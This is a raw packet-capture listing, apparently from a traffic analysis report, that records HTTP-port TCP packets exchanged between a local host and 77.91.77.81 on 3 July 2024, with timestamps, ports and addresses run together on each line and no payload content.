                                                                Jul 3, 2024 08:38:35.682498932 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.682518959 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.682578087 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.682590008 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.682625055 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.682650089 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.682671070 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.682682991 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.682732105 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.682732105 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.682770967 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.682781935 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.682836056 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.682836056 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.682910919 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.682921886 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.682933092 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.682941914 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.682951927 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.682960987 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.682971001 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.682988882 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.682988882 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.683022022 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.683192968 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.683203936 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.683258057 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.683285952 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.683296919 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.683306932 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.683316946 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.683326960 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.683337927 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.683340073 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.683347940 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.683366060 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.683398008 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.683661938 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.683671951 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.683722973 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.683722973 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.683764935 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.683779955 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.683789968 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.683800936 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.683813095 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.683824062 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.683832884 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.683834076 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.683834076 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.683865070 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.683885098 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.684056044 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.684066057 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.684076071 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.684087038 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.684118032 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.684118032 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.684150934 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.684163094 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.684169054 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.684180021 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.684190035 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.684201002 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.684211016 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.684211969 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.684240103 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.684240103 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.684634924 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.684649944 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.684659958 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.684669971 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.684679985 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.684685946 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.684689045 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.684699059 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.684710026 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.684717894 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.684720039 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.684732914 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.684746981 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.684760094 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.684806108 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.685139894 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.685164928 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.685174942 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.685184002 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.685193062 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.685204029 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.685209990 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.685209990 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.685214996 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.685225964 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.685236931 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.685247898 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.685250998 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.685257912 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.685269117 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.685278893 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.685287952 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.685287952 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.685291052 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.685300112 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.685303926 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.685314894 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.685324907 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.685338974 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.685340881 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.685340881 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.685349941 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.685376883 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.685376883 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.685394049 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.685980082 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.685997963 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.686007023 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.686017036 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.686028004 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.686037064 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.686054945 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.686054945 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.686081886 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.701157093 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.701205015 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.701215982 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.701221943 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.701271057 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.701271057 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.701320887 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.701332092 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.701343060 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.701354027 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.701364040 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.701375961 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.701416969 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.701556921 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.701567888 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.701582909 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.701595068 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.701617002 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.701633930 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.701728106 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.701739073 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.701822996 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.714618921 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.714682102 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.715099096 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.715187073 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.715251923 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.715261936 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.715270996 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.715281010 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.715291023 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.715306044 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.715358973 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.715399981 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.715415955 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.715431929 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.715496063 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.715692043 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.715702057 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.715712070 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.715723038 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.715734005 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.715742111 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.715748072 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.715774059 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.715794086 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.770936966 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.771011114 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.771102905 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.771112919 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.771140099 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.771147013 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.771152020 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.771169901 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.771178961 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.771220922 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.771245003 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.771256924 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.771346092 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.771356106 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.771358013 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.771367073 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.771414042 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.771414042 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.771666050 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.771729946 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.771740913 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.771747112 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.771783113 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.771783113 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.771858931 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.771869898 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.771881104 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.771892071 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.771909952 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.771976948 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.772011995 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.772072077 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.772083044 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.772084951 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.772094011 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.772104979 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.772115946 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.772146940 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.772169113 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.772325993 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.772336960 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.772347927 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.772357941 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.772367954 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.772378922 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.772388935 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.772397041 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.772403002 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.772418022 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.772430897 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.772471905 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.772701979 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.772712946 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.772722960 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.772732973 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.772742987 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.772753954 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.772816896 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.772978067 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.772988081 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.772998095 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.773008108 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.773017883 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.773027897 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.773037910 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.773044109 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.773049116 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.773060083 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.773066998 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.773066998 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.773092031 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.773129940 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.773504972 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.773520947 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.773530960 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.773540974 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.773550987 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.773552895 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.773561954 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.773572922 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.773576975 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.773587942 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.773597956 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.773607969 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.773613930 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.773617983 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.773628950 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.773633003 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.773639917 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.773639917 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.773649931 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.773662090 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.773663998 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.773701906 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.773701906 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.774221897 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.774234056 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.774244070 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.774255037 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.774270058 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.774271011 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.774280071 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.774291992 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.774302006 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.774307966 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.774312973 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.774347067 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.774347067 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.774672985 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.774683952 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.774693966 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.774703979 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.774713993 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.774723053 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.774732113 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.774732113 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.774732113 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.774744034 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.774755001 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.774765015 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.774775028 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.774781942 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.774789095 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.774801016 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.774810076 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.774818897 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.774818897 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.774821043 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.774832010 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.774844885 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.774847984 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.774847984 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.774856091 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.774866104 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.774869919 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.774904013 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.789904118 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.789949894 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.789957047 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.789962053 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.789994001 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.790018082 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.790035009 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.790046930 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.790057898 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.790117979 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.790117979 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.790213108 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.790224075 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.790230036 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.790235996 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.790338039 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.790374041 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.790429115 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.790433884 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.790441036 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.790451050 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.790460110 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.790467978 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.790494919 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.790545940 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.804078102 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.804100037 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.804110050 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.804132938 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.804147959 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.804163933 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.804192066 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.804224014 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.804234982 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:35.804280996 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:35.804356098 CEST804972577.91.77.81192.168.2.6
